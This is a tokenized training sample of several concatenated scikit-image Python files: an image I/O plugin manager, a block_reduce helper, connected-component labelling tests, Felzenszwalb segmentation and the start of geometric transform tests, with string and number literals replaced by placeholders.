<s> """<STR_LIT>""" <EOL> import sys <EOL> if sys . version . startswith ( '<STR_LIT:3>' ) : <EOL> from configparser import ConfigParser <EOL> else : <EOL> from ConfigParser import ConfigParser <EOL> import os . path <EOL> from glob import glob <EOL> from . collection import imread_collection_wrapper <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> plugin_store = None <EOL> plugin_provides = { } <EOL> plugin_module_name = { } <EOL> plugin_meta_data = { } <EOL> preferred_plugins = { <EOL> '<STR_LIT:all>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] <EOL> } <EOL> def _clear_plugins ( ) : <EOL> """<STR_LIT>""" <EOL> global plugin_store <EOL> plugin_store = { '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] } <EOL> _clear_plugins ( ) <EOL> def _load_preferred_plugins ( ) : <EOL> io_types = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> for p_type in io_types : <EOL> _set_plugin ( p_type , preferred_plugins [ '<STR_LIT:all>' ] ) <EOL> plugin_types = ( p for p in preferred_plugins . keys ( ) if p != '<STR_LIT:all>' ) <EOL> for p_type in plugin_types : <EOL> _set_plugin ( p_type , preferred_plugins [ p_type ] ) <EOL> def _set_plugin ( plugin_type , plugin_list ) : <EOL> for plugin in plugin_list : <EOL> if plugin not in available_plugins : <EOL> continue <EOL> try : <EOL> use_plugin ( plugin , kind = plugin_type ) <EOL> break <EOL> except ( ImportError , RuntimeError , OSError ) : <EOL> pass <EOL> def reset_plugins ( ) : <EOL> _clear_plugins ( ) <EOL> _load_preferred_plugins ( ) <EOL> def _parse_config_file ( filename ) : <EOL> """<STR_LIT>""" <EOL> parser = ConfigParser ( ) <EOL> parser . read ( filename ) <EOL> name = parser . sections ( ) [ <NUM_LIT:0> ] <EOL> meta_data = { } <EOL> for opt in parser . options ( name ) : <EOL> meta_data [ opt ] = parser . get ( name , opt ) <EOL> return name , meta_data <EOL> def _scan_plugins ( ) : <EOL> """<STR_LIT>""" <EOL> pd = os . path . dirname ( __file__ ) <EOL> config_files = glob ( os . path . join ( pd , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> for filename in config_files : <EOL> name , meta_data = _parse_config_file ( filename ) <EOL> plugin_meta_data [ name ] = meta_data <EOL> provides = [ s . strip ( ) for s in meta_data [ '<STR_LIT>' ] . split ( '<STR_LIT:U+002C>' ) ] <EOL> valid_provides = [ p for p in provides if p in plugin_store ] <EOL> for p in provides : <EOL> if not p in plugin_store : <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( name , p ) ) <EOL> need_to_add_collection = ( '<STR_LIT>' not in valid_provides and <EOL> '<STR_LIT>' in valid_provides ) <EOL> if need_to_add_collection : <EOL> valid_provides . append ( '<STR_LIT>' ) <EOL> plugin_provides [ name ] = valid_provides <EOL> plugin_module_name [ name ] = os . path . basename ( filename ) [ : - <NUM_LIT:4> ] <EOL> _scan_plugins ( ) <EOL> def find_available_plugins ( loaded = False ) : <EOL> """<STR_LIT>""" <EOL> active_plugins = set ( ) <EOL> for plugin_func in plugin_store . values ( ) : <EOL> for plugin , func in plugin_func : <EOL> active_plugins . add ( plugin ) <EOL> d = { } <EOL> for plugin in plugin_provides : <EOL> if not loaded or plugin in active_plugins : <EOL> d [ plugin ] = [ f for f in plugin_provides [ plugin ] <EOL> if not f . startswith ( '<STR_LIT:_>' ) ] <EOL> return d <EOL> available_plugins = find_available_plugins ( ) <EOL> def call_plugin ( kind , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if not kind in plugin_store : <EOL> raise ValueError ( '<STR_LIT>' % kind ) <EOL> plugin_funcs = plugin_store [ kind ] <EOL> if len ( plugin_funcs ) == <NUM_LIT:0> : <EOL> msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> raise RuntimeError ( msg % kind ) <EOL> plugin = kwargs . pop ( '<STR_LIT>' , None ) <EOL> if plugin is None : <EOL> _ , func = plugin_funcs [ <NUM_LIT:0> ] <EOL> else : <EOL> _load ( plugin ) <EOL> try : <EOL> func = [ f for ( p , f ) in plugin_funcs if p == plugin ] [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> raise RuntimeError ( '<STR_LIT>' % <EOL> ( plugin , kind ) ) <EOL> return func ( * args , ** kwargs ) <EOL> def use_plugin ( name , kind = None ) : <EOL> """<STR_LIT>""" <EOL> if kind is None : <EOL> kind = plugin_store . keys ( ) <EOL> else : <EOL> if not kind in plugin_provides [ name ] : <EOL> raise RuntimeError ( "<STR_LIT>" % <EOL> ( name , kind ) ) <EOL> if kind == '<STR_LIT>' : <EOL> kind = [ kind , '<STR_LIT>' ] <EOL> else : <EOL> kind = [ kind ] <EOL> _load ( name ) <EOL> for k in kind : <EOL> if not k in plugin_store : <EOL> raise RuntimeError ( "<STR_LIT>" % k ) <EOL> funcs = plugin_store [ k ] <EOL> funcs = [ ( n , f ) for ( n , f ) in funcs if n == name ] + [ ( n , f ) for ( n , f ) in funcs if n != name ] <EOL> plugin_store [ k ] = funcs <EOL> def _inject_imread_collection_if_needed ( module ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( module , '<STR_LIT>' ) and hasattr ( module , '<STR_LIT>' ) : <EOL> imread = getattr ( module , '<STR_LIT>' ) <EOL> func = imread_collection_wrapper ( imread ) <EOL> setattr ( module , '<STR_LIT>' , func ) <EOL> def _load ( plugin ) : <EOL> """<STR_LIT>""" <EOL> if plugin in find_available_plugins ( loaded = True ) : <EOL> return <EOL> if not plugin in plugin_module_name : <EOL> raise ValueError ( "<STR_LIT>" % plugin ) <EOL> else : <EOL> modname = plugin_module_name [ plugin ] <EOL> plugin_module = __import__ ( '<STR_LIT>' + modname , <EOL> fromlist = [ modname ] ) <EOL> provides = plugin_provides [ plugin ] <EOL> for p in provides : <EOL> if p == '<STR_LIT>' : <EOL> _inject_imread_collection_if_needed ( plugin_module ) <EOL> elif not hasattr ( plugin_module , p ) : <EOL> print ( "<STR_LIT>" % <EOL> ( plugin , p ) ) <EOL> continue <EOL> store = plugin_store [ p ] <EOL> func = getattr ( plugin_module , p ) <EOL> if not ( plugin , func ) in store : <EOL> store . append ( ( plugin , func ) ) <EOL> def plugin_info ( plugin ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return plugin_meta_data [ plugin ] <EOL> except KeyError : <EOL> raise ValueError ( '<STR_LIT>' % plugin ) <EOL> def plugin_order ( ) : <EOL> """<STR_LIT>""" <EOL> p = { } <EOL> for func in plugin_store : <EOL> p [ func ] = [ plugin_name for ( plugin_name , f ) in plugin_store [ func ] ] <EOL> return p </s>
<s> import numpy as np <EOL> from . . util import view_as_blocks , pad <EOL> def block_reduce ( image , block_size , func = np . sum , cval = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> if len ( block_size ) != image . ndim : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> pad_width = [ ] <EOL> for i in range ( len ( block_size ) ) : <EOL> if block_size [ i ] < <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if image . shape [ i ] % block_size [ i ] != <NUM_LIT:0> : <EOL> after_width = block_size [ i ] - ( image . shape [ i ] % block_size [ i ] ) <EOL> else : <EOL> after_width = <NUM_LIT:0> <EOL> pad_width . append ( ( <NUM_LIT:0> , after_width ) ) <EOL> image = pad ( image , pad_width = pad_width , mode = '<STR_LIT>' , <EOL> constant_values = cval ) <EOL> out = view_as_blocks ( image , block_size ) <EOL> for i in range ( len ( out . shape ) // <NUM_LIT:2> ) : <EOL> out = func ( out , axis = - <NUM_LIT:1> ) <EOL> return out </s>
<s> import numpy as np <EOL> from numpy . testing import assert_array_equal , run_module_suite <EOL> from skimage . measure import label <EOL> import skimage . measure . _ccomp as ccomp <EOL> from skimage . _shared . _warnings import expected_warnings <EOL> BG = <NUM_LIT:0> <EOL> class TestConnectedComponents : <EOL> def setup ( self ) : <EOL> self . x = np . array ( [ [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:9> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:9> , <NUM_LIT:2> , <NUM_LIT:9> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:9> , <NUM_LIT:9> , <NUM_LIT:9> ] , <EOL> [ <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:3> , <NUM_LIT:0> ] ] ) <EOL> self . labels = np . array ( [ [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:4> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:6> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:0> ] ] ) <EOL> def test_basic ( self ) : <EOL> assert_array_equal ( label ( self . x ) , self . labels ) <EOL> assert self . x [ <NUM_LIT:0> , <NUM_LIT:2> ] == <NUM_LIT:3> <EOL> def test_random ( self ) : <EOL> x = ( np . random . rand ( <NUM_LIT:20> , <NUM_LIT:30> ) * <NUM_LIT:5> ) . astype ( np . int ) <EOL> labels = label ( x ) <EOL> n = labels . max ( ) <EOL> for i in range ( n ) : <EOL> values = x [ labels == i ] <EOL> assert np . all ( values == values [ <NUM_LIT:0> ] ) <EOL> def test_diag ( self ) : <EOL> x = np . array ( [ [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) <EOL> assert_array_equal ( label ( x ) , x ) <EOL> def test_4_vs_8 ( self ) : <EOL> x = np . array ( [ [ <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> ] ] , dtype = int ) <EOL> assert_array_equal ( label ( x , <NUM_LIT:4> ) , <EOL> [ [ <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:2> , <NUM_LIT:0> ] ] ) <EOL> assert_array_equal ( label ( x , <NUM_LIT:8> ) , <EOL> [ [ <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> ] ] ) <EOL> def test_background ( self ) : <EOL> x = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:5> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) <EOL> assert_array_equal ( label ( x ) , [ [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) <EOL> assert_array_equal ( label ( x , background = <NUM_LIT:0> ) , <EOL> [ [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) <EOL> def test_background_two_regions ( self ) : <EOL> x = np . array ( [ [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> ] ] ) <EOL> res = label ( x , background = <NUM_LIT:0> ) <EOL> assert_array_equal ( res , <EOL> [ [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> ] ] ) <EOL> def test_background_one_region_center ( self ) : <EOL> x = np . array ( [ [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) <EOL> assert_array_equal ( label ( x , neighbors = <NUM_LIT:4> , background = <NUM_LIT:0> ) , <EOL> [ [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) <EOL> def test_return_num ( self ) : <EOL> x = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> ] ] ) <EOL> assert_array_equal ( label ( x , return_num = True ) [ <NUM_LIT:1> ] , <NUM_LIT:3> ) <EOL> assert_array_equal ( label ( x , background = - <NUM_LIT:1> , return_num = True ) [ <NUM_LIT:1> ] , <NUM_LIT:4> ) <EOL> class TestConnectedComponents3d : <EOL> def setup ( self ) : <EOL> self . x = np . zeros ( ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ) , int ) <EOL> self . x [ <NUM_LIT:0> ] = np . array ( [ [ <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:9> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:9> , <NUM_LIT:2> , <NUM_LIT:9> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:9> , <NUM_LIT:9> , <NUM_LIT:9> ] , <EOL> [ <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:3> , <NUM_LIT:0> ] ] ) <EOL> self . x [ <NUM_LIT:1> ] = np . array ( [ [ <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:9> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:9> , <NUM_LIT:2> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:0> ] ] ) <EOL> self . x [ <NUM_LIT:2> ] = np . array ( [ [ <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:8> , <NUM_LIT:8> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:9> , <NUM_LIT:8> , <NUM_LIT:8> ] , <EOL> [ <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:8> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) <EOL> self . labels = np . zeros ( ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ) , int ) <EOL> self . labels [ <NUM_LIT:0> ] = np . array ( [ [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:4> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:1> , <NUM_LIT:0> ] ] ) <EOL> self . labels [ <NUM_LIT:1> ] = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> ] ] ) <EOL> self . labels [ <NUM_LIT:2> ] = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:7> , <NUM_LIT:7> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:8> , <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:7> , <NUM_LIT:7> ] , <EOL> [ <NUM_LIT:8> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:7> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:8> , <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) <EOL> def test_basic ( self ) : <EOL> labels = label ( self . x ) <EOL> assert_array_equal ( labels , self . labels ) <EOL> assert self . x [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:2> ] == <NUM_LIT:2> , "<STR_LIT>" <EOL> def test_random ( self ) : <EOL> x = ( np . random . rand ( <NUM_LIT:20> , <NUM_LIT:30> ) * <NUM_LIT:5> ) . astype ( np . int ) <EOL> labels = label ( x ) <EOL> n = labels . max ( ) <EOL> for i in range ( n ) : <EOL> values = x [ labels == i ] <EOL> assert np . all ( values == values [ <NUM_LIT:0> ] ) <EOL> def test_diag ( self ) : <EOL> x = np . zeros ( ( <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> ) , int ) <EOL> x [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:2> ] = <NUM_LIT:1> <EOL> x [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] = <NUM_LIT:1> <EOL> x [ <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> assert_array_equal ( label ( x ) , x ) <EOL> def test_4_vs_8 ( self ) : <EOL> x = np . zeros ( ( <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> ) , int ) <EOL> x [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> ] = <NUM_LIT:1> <EOL> x [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> label4 = x . copy ( ) <EOL> label4 [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] = <NUM_LIT:2> <EOL> assert_array_equal ( label ( x , <NUM_LIT:4> ) , label4 ) <EOL> assert_array_equal ( label ( x , <NUM_LIT:8> ) , x ) <EOL> def test_background ( self ) : <EOL> x = np . zeros ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:3> ) , int ) <EOL> x [ <NUM_LIT:0> ] = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) <EOL> x [ <NUM_LIT:1> ] = np . array ( [ [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:5> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) <EOL> lnb = x . copy ( ) <EOL> lnb [ <NUM_LIT:0> ] = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> ] , <EOL> [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> ] ] ) <EOL> lnb [ <NUM_LIT:1> ] = np . array ( [ [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> ] , <EOL> [ <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> ] ] ) <EOL> lb = x . copy ( ) <EOL> lb [ <NUM_LIT:0> ] = np . array ( [ [ <NUM_LIT:1> , BG , BG ] , <EOL> [ <NUM_LIT:1> , BG , BG ] , <EOL> [ BG , BG , BG ] ] ) <EOL> lb [ <NUM_LIT:1> ] = np . array ( [ [ BG , BG , BG ] , <EOL> [ BG , <NUM_LIT:1> , <NUM_LIT:2> ] , <EOL> [ BG , BG , BG ] ] ) <EOL> assert_array_equal ( label ( x ) , lb ) <EOL> assert_array_equal ( label ( x , background = - <NUM_LIT:1> ) , lnb ) <EOL> def test_background_two_regions ( self ) : <EOL> x = np . zeros ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:3> ) , int ) <EOL> x [ <NUM_LIT:0> ] = np . array ( [ [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> ] ] ) <EOL> x [ <NUM_LIT:1> ] = np . array ( [ [ <NUM_LIT:6> , <NUM_LIT:6> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) <EOL> lb = x . copy ( ) <EOL> lb [ <NUM_LIT:0> ] = np . array ( [ [ BG , BG , <NUM_LIT:1> ] , <EOL> [ BG , BG , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> ] ] ) <EOL> lb [ <NUM_LIT:1> ] = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:1> , BG ] , <EOL> [ <NUM_LIT:2> , BG , BG ] , <EOL> [ BG , BG , BG ] ] ) <EOL> res = label ( x , background = <NUM_LIT:0> ) <EOL> assert_array_equal ( res , lb ) <EOL> def test_background_one_region_center ( self ) : <EOL> x = np . zeros ( ( <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> ) , int ) <EOL> x [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] = <NUM_LIT:1> <EOL> lb = np . ones_like ( x ) * BG <EOL> lb [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] = <NUM_LIT:1> <EOL> assert_array_equal ( label ( x , neighbors = <NUM_LIT:4> , background = <NUM_LIT:0> ) , lb ) <EOL> def test_return_num ( self ) : <EOL> x = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> ] ] ) <EOL> assert_array_equal ( label ( x , return_num = True ) [ <NUM_LIT:1> ] , <NUM_LIT:3> ) <EOL> assert_array_equal ( label ( x , background = - <NUM_LIT:1> , return_num = True ) [ <NUM_LIT:1> ] , <NUM_LIT:4> ) <EOL> def test_1D ( self ) : <EOL> x = np . array ( ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> xlen = len ( x ) <EOL> y = np . array ( ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> reshapes = ( ( xlen , ) , <EOL> ( <NUM_LIT:1> , xlen ) , ( xlen , <NUM_LIT:1> ) , <EOL> ( <NUM_LIT:1> , xlen , <NUM_LIT:1> ) , ( xlen , <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> , xlen ) ) <EOL> for reshape in reshapes : <EOL> x2 = x . reshape ( reshape ) <EOL> labelled = label ( x2 ) <EOL> assert_array_equal ( y , labelled . flatten ( ) ) <EOL> def test_nd ( self ) : <EOL> x = np . ones ( ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) ) <EOL> np . testing . assert_raises ( NotImplementedError , label , x ) <EOL> class TestSupport : <EOL> def test_reshape ( self ) : <EOL> shapes_in = ( ( <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:5> ) , ( <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:2> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , ) ) <EOL> for shape in shapes_in : <EOL> shape = np . array ( shape ) <EOL> numones = sum ( shape == <NUM_LIT:1> ) <EOL> inp = np . random . random ( shape ) <EOL> fixed , swaps = ccomp . reshape_array ( inp ) <EOL> shape2 = fixed . shape <EOL> for i in range ( numones ) : <EOL> assert shape2 [ i ] == <NUM_LIT:1> <EOL> back = ccomp . undo_reshape_array ( fixed , swaps ) <EOL> assert_array_equal ( inp , back ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> run_module_suite ( ) </s>
<s> import numpy as np <EOL> from . . _shared . utils import warn <EOL> from . _felzenszwalb_cy import _felzenszwalb_grey <EOL> def felzenszwalb ( image , scale = <NUM_LIT:1> , sigma = <NUM_LIT> , min_size = <NUM_LIT:20> ) : <EOL> """<STR_LIT>""" <EOL> if image . ndim == <NUM_LIT:2> : <EOL> return _felzenszwalb_grey ( image , scale = scale , sigma = sigma , <EOL> min_size = min_size ) <EOL> elif image . ndim != <NUM_LIT:3> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % image . ndim ) <EOL> n_channels = image . shape [ <NUM_LIT:2> ] <EOL> if n_channels != <NUM_LIT:3> : <EOL> warn ( "<STR_LIT>" <EOL> "<STR_LIT>" % image . shape [ <NUM_LIT:2> ] ) <EOL> segmentations = [ ] <EOL> for c in range ( n_channels ) : <EOL> channel = np . ascontiguousarray ( image [ : , : , c ] ) <EOL> s = _felzenszwalb_grey ( channel , scale = scale , sigma = sigma , <EOL> min_size = min_size ) <EOL> segmentations . append ( s ) <EOL> n0 = segmentations [ <NUM_LIT:0> ] . max ( ) + <NUM_LIT:1> <EOL> n1 = segmentations [ <NUM_LIT:1> ] . max ( ) + <NUM_LIT:1> <EOL> segmentation = ( segmentations [ <NUM_LIT:0> ] + segmentations [ <NUM_LIT:1> ] * n0 <EOL> + segmentations [ <NUM_LIT:2> ] * n0 * n1 ) <EOL> labels = np . unique ( segmentation , return_inverse = True ) [ <NUM_LIT:1> ] <EOL> return labels . reshape ( image . shape [ : <NUM_LIT:2> ] ) </s>
<s> import numpy as np <EOL> from numpy . testing import ( assert_equal , assert_almost_equal , <EOL> assert_raises ) <EOL> from skimage . transform . _geometric import _stackcopy <EOL> from skimage . transform . _geometric import GeometricTransform <EOL> from skimage . transform import ( estimate_transform , matrix_transform , <EOL> SimilarityTransform , AffineTransform , <EOL> ProjectiveTransform , PolynomialTransform , <EOL> PiecewiseAffineTransform ) <EOL> from skimage . _shared . _warnings import expected_warnings <EOL> SRC = np . array ( [ <EOL> [ - <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ - <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] , <EOL> [ - <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ - <NUM_LIT> , - <NUM_LIT> ] , <EOL> ] ) <EOL> DST = np . array ( [ <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> 